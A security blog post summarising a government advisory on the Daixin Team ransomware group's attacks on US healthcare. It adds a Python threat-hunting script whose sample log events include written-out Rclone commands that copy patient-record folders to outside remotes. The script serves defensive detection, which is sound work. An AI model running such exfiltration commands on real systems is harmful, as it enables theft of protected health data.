
Healthcare Sector Being Actively Targeted by Daixin Team Ransomware


Note: FRSecure is aware of malware named Daxin. Daixin and Daxin appear to be related, and the difference in names is due to “Daxin” being used in some ransom notes.

In conjunction with the Federal Bureau of Investigation (FBI) and the Department of Health and Human Services (HHS), the Cybersecurity and Infrastructure Security Agency (CISA) today advised that the Daixin Team is actively targeting US businesses, particularly in the Healthcare and Public Health Sector (HPH).

The Daixin Team is a data extortion and ransomware group that has been targeting the HPH Sector since at least June 2022. Servers holding personally identifiable information (PII) and protected health information (PHI) are highly sought-after targets, and the group has threatened to release such information if ransoms are not paid. According to the advisory, Daixin Team threat actors typically gain initial access to victims’ networks through VPN servers and then move laterally with SSH and remote desktop. The ransomware is based on leaked Babuk Locker source code, and the group used Rclone for data exfiltration in at least one confirmed compromise.
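As an added example (not from the advisory or from FRSecure), the following Python code shows one way to hunt process-creation logs for the Rclone exfiltration behavior noted above, including the case where the binary has been renamed. The event fields, host names, paths and remote names are constructed sample data, and the command-line shape heuristic is an assumption rather than an IOC from the advisory.

```python
import re
import shlex
from pathlib import PureWindowsPath

# Real rclone subcommands that move data between a host and a remote.
TRANSFER_CMDS = {"copy", "sync", "move", "copyto", "moveto"}
# Rclone remotes are written "name:path". Requiring 2+ characters before the
# colon skips Windows drive letters; the lookahead skips URLs such as https://.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_\-]{2,}:(?!//)")

def classify(cmdline):
    """Return why a command line resembles an Rclone transfer, or None."""
    argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    if not argv:
        return None
    exe = PureWindowsPath(argv[0]).stem.lower()
    args = argv[1:]
    transfer = any(a.lower() in TRANSFER_CMDS for a in args)
    remote = any(REMOTE_RE.match(a) for a in args)
    if transfer and remote:
        # Shape match alone catches a renamed binary (heuristic, an assumption).
        return ("rclone transfer to remote" if exe == "rclone"
                else "rclone-style transfer from renamed binary")
    return "rclone binary executed" if exe == "rclone" else None

def hunt(events):
    """Return (host, reason) for every event that classify() flags."""
    hits = []
    for ev in events:
        reason = classify(ev["cmdline"])
        if reason:
            hits.append((ev["host"], reason))
    return hits

# Constructed sample events (hypothetical hosts, paths and remote names).
SAMPLE_EVENTS = [
    {"host": "ehr-db01", "cmdline": r"C:\Windows\Temp\rclone.exe copy D:\PatientRecords remote1:bk --transfers 8"},
    {"host": "pacs-02", "cmdline": r'"C:\ProgramData\svchost.exe" --config C:\ProgramData\r.conf sync E:\Exports offsite:dump'},
    {"host": "ws-114", "cmdline": r"C:\Windows\System32\cmd.exe /c copy report.docx \\fs01\share"},
    {"host": "ws-200", "cmdline": r"C:\Tools\curl.exe -O https://example.org/file.zip"},
]

if __name__ == "__main__":
    for host, reason in hunt(SAMPLE_EVENTS):
        print(f"{host}: {reason}")
```

Matches on command-line shape alone can produce false positives from other tools that use a `name:path` argument, so treat hits as leads to correlate with outbound transfer volume rather than as confirmed exfiltration.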

CISA is urging organizations to prioritize patching VPN servers, remote access software, virtual machine software, and known exploited vulnerabilities.

To see the full advisory, along with known Indicators of Compromise (IOCs) at this time, visit:
